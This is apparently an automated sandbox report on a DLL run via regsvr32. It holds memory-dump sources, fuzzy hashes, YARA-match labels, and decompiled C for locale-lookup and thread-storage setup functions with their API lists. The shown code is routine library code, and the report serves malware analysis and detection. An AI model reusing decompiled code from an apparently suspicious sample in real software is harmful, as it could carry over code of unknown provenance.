Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: bcf109f5de06b5c94f6bb42cf1b44ca8dbb3bfcebafd793729c585c81d35ca35
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: E0D15F73C0AAB30A8376C12D415862EEEE2AFC199531BC7E1DCD43F289D136DE8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 10018E7D, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 58f509fdb222ca7060b2eae822090135517dfdc7c002ac52267cef539c7c6eb7
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 07D16073C0AAB30A8376C12D415852EEBE2AFC199531BC7E1DCD43F289D636DE8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 10018A71, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: cc46d25ea22f0c970390981d75405525d0e25b6b0a86731603265a14af2b5516
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 2EC14F73C0AAF30A8375C12D455812AEFE2AFC169531BC7E1DCD43F28992369F8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 1001869D, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: dcda9d5c94f77def7d8943a89e96ba339e92ee3075ebe02bffe06bb3663a938a
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 2AC14D73D0AAF30A8365C12D455812AEAE2AFC158432FC7A1DCD43F289D636DF8597D0

Uniqueness

Uniqueness Score: -1.00%

Function 04B81CA1, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction ID: 86f8719919be29a0248b807e8f8525225d6f3984f5472cc88dbe8da1c2d9a45b
Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction Fuzzy Hash: 195131721093029FCB14EF21D88945FBBE1FBD8758F404E6CF19996221D7B59A0ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 04B9FF58, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28364bca6b8a3524cd78f2faa6e7f503ee6dd44b34b2610873c9c9772295de3d
Instruction ID: 02da457611ed7b3b90c3448c927f809643af3e3d8b0ffc8fc39d861af52b0b6f
Opcode Fuzzy Hash: 28364bca6b8a3524cd78f2faa6e7f503ee6dd44b34b2610873c9c9772295de3d
Instruction Fuzzy Hash: 13410E71D0122DEBCF04DFA1D94A4DEBFB2FB48318F108099D521B6220C3B90A58DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B94244, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction ID: 6b0d589f3f6af0ea5692e84c25eb9dbde7231ff49334f320057641d74033377e
Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction Fuzzy Hash: CD316B726093518FC705CF28C48155BFBE0FB88758F454BADF88AA7221D774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04B93D85, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction ID: 0fd62723fbbc56bfbe652d478fa4a6874c76ddc381f60a7d6f806f33da854ab6
Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction Fuzzy Hash: E43189726083018FD718DF29C98540BBBE2FBC8718F044B6DE88DA3214DB74EA058B56

Uniqueness

Uniqueness Score: -1.00%

Function 04B8F0E9, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction ID: ccbd5694d59d56c557364ac2b8802280aa68c41524350da7e6b730944f06985b
Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction Fuzzy Hash: 0E210476E00209EBDF08CFE5C9099EEBBB2EB54314F20C09AE514AB290D7B55B54DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04B9567B, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction ID: 12edcb5876575f4a8a9ebd77692cfbb2fbf416dc3fee489fa60b2fe9d3ac43f3
Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction Fuzzy Hash: FB311872E00209EBEB54DFA5C9898AEFBF1FB40314F2480A9D515B7210D3B46F559F81

Uniqueness

Uniqueness Score: -1.00%

Function 04B90EBC, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction ID: 5d9013f8e15697865dfc681b1e209a74cc5c4a3800abd5772428b1c4e16f1868
Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction Fuzzy Hash: 6B211F71801219FBCF18DFA1CD4A8DFBFB4FF08358F108688E958A2220D3798A14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B8EF0C, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction ID: 0db5d522afbe977ae513dd4e6fa1230e39514cc0bbd32efd1be7289c7378712d
Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction Fuzzy Hash: 9B21E372C0120DABDF09DFE5CA4A5EFFBB5EB44204F608299D512B6220D3B55B059BA2

Uniqueness

Uniqueness Score: -1.00%

Function 04B8C5D8, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction ID: f1e68b3b216459c5ca129674b3618ae58072de45fcba4076f4a56ac8575ef4a6
Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction Fuzzy Hash: 2621FEB5D0020DEBDB08DFE1C98A4EEBBB1BB54718F208089D525B6260D7B55B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 04B8F7F7, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA3A, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10057a08; // 0xe86d94f5
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10017BC1(E10027E56, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1000A2DF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1000A8D0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x1000aa3a
0x1000aa3b
0x1000aa41
0x1000aa45
0x1000aa4c
0x1000aa52
0x1000aa59
0x1000aa6a
0x1000aa71
0x1000aa74
0x1000aa77
0x1000aa7a
0x1000aa88
0x1000aa8b
0x1000aa8f
0x1000ab5d
0x1000ac19
0x1000ac1d
0x1000ac31
0x1000ac34
0x1000ac3e
0x1000ac44
0x1000ac5c
0x1000ac68
0x1000ac6d
0x1000ac70
0x1000ac70
0x1000ac3e
0x1000ab63
0x1000ab77
0x1000ab82
0x1000ab98
0x1000aba7
0x1000abbf
0x1000abc4
0x1000abca
0x1000abd6
0x1000abd9
0x1000abeb
0x1000abf7
0x1000abfc
0x1000abff
0x1000abff
0x1000abca
0x1000ac09
0x1000ac09
0x1000ab82
0x1000aa95
0x1000aa9d
0x1000aaa0
0x1000aaa3
0x1000aab5
0x1000aabe
0x1000aac6
0x1000aad3
0x1000aad6
0x1000aadd
0x1000aae1
0x1000aae5
0x1000aae8
0x1000aaeb
0x1000aaf8
0x1000ab04
0x1000ab09
0x1000ab0c
0x1000ab0c
0x1000ab13
0x1000ab13
0x1000ab18
0x1000ab1b
0x1000ab32
0x1000ab39
0x1000ab48
0x1000ac7e
0x1000ac85
0x1000ac95
0x1000ac98
0x1000ac9b
0x1000aca2
0x1000aca5
0x1000acac
0x1000acb8
0x1000acc2
0x1000acc7
0x1000acc7
0x1000accc
0x1000acd1
0x1000acee
0x1000acee
0x1000acf5
0x1000acfa
0x00000000
0x1000acd3
0x1000acd3
0x1000acda
0x1000ace2
0x00000000
0x00000000
0x1000ace4
0x1000ace8
0x00000000
0x00000000
0x00000000
0x1000acea
0x1000acec
0x00000000
0x1000acec
0x1000ab4e
0x1000ab4e
0x1000acfc
0x1000acff
0x1000ad07
0x1000ad08
0x1000ad09
0x1000ad1e
0x1000ad1e

APIs

__EH_prolog3.LIBCMT ref: 1000AA59
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
GetVersion.KERNEL32 ref: 1000AB55
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
_sscanf.LIBCMT ref: 1000ABBF
ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 1000ABFA
RegCloseKey.ADVAPI32(?), ref: 1000AC09
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 1000AC6B
_memset.LIBCMT ref: 1000AC85

Strings

ntdll.dll, xrefs: 1000AC14
kernel32.dll, xrefs: 1000AA6C
GetSystemDefaultUILanguage, xrefs: 1000AACB
GetUserDefaultUILanguage, xrefs: 1000AA82
Control Panel\Desktop\ResourceLocale, xrefs: 1000AB6D

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C11B, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1001C11B(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x1005aea4;
					_t40 = TlsSetValue;
					 *0x1005aeb0 = _t7;
					if( *0x1005aea4 == 0) {
						L6:
						 *0x1005aea8 = TlsGetValue;
						 *0x1005aea4 = E1001BDD2;
						 *0x1005aeac = _t40;
						 *0x1005aeb0 = TlsFree;
					} else {
						__eflags =  *0x1005aea8;
						if( *0x1005aea8 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005aeac;
							if( *0x1005aeac == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10057d30 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1005aea8);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10018042();
							 *0x1005aea4 = E1001BD03( *0x1005aea4);
							 *0x1005aea8 = E1001BD03( *0x1005aea8);
							 *0x1005aeac = E1001BD03( *0x1005aeac);
							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
							_t18 = E1001A3D3();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1001BE05();
								goto L15;
							} else {
								_push(E1001BF91);
								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10057d2c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1001E76E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10057d2c);
										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001BE42(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1001BE05();
					return 0;
				}
			}

0x1001c11b
0x1001c127
0x1001c12b
0x1001c14b
0x1001c158
0x1001c165
0x1001c16a
0x1001c16c
0x1001c173
0x1001c179
0x1001c17e
0x1001c196
0x1001c19b
0x1001c1a5
0x1001c1af
0x1001c1b5
0x1001c180
0x1001c180
0x1001c187
0x00000000
0x1001c189
0x1001c189
0x1001c190
0x00000000
0x1001c192
0x1001c192
0x1001c194
0x00000000
0x00000000
0x1001c194
0x1001c190
0x1001c187
0x1001c1ba
0x1001c1c0
0x1001c1c3
0x1001c1c8
0x1001c29a
0x1001c29a
0x1001c29a
0x1001c1ce
0x1001c1d5
0x1001c1d7
0x1001c1d9
0x00000000
0x1001c1df
0x1001c1df
0x1001c1f5
0x1001c205
0x1001c215
0x1001c222
0x1001c227
0x1001c22c
0x1001c22e
0x1001c295
0x1001c295
0x00000000
0x1001c230
0x1001c230
0x1001c241
0x1001c243
0x1001c246
0x1001c24b
0x00000000
0x1001c24d
0x1001c259
0x1001c25b
0x1001c25f
0x00000000
0x1001c261
0x1001c261
0x1001c262
0x1001c276
0x1001c278
0x00000000
0x1001c27a
0x1001c27a
0x1001c27c
0x1001c27d
0x1001c284
0x1001c28a
0x1001c28e
0x1001c292
0x1001c292
0x1001c278
